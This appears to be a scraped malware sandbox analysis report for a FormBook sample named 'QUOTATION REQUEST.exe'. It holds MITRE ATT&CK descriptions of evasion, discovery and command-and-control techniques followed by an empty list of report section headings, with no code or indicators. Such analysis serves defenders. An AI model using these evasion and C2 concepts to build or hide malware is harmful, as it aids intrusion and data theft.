Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report QUOTATION REQUEST.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph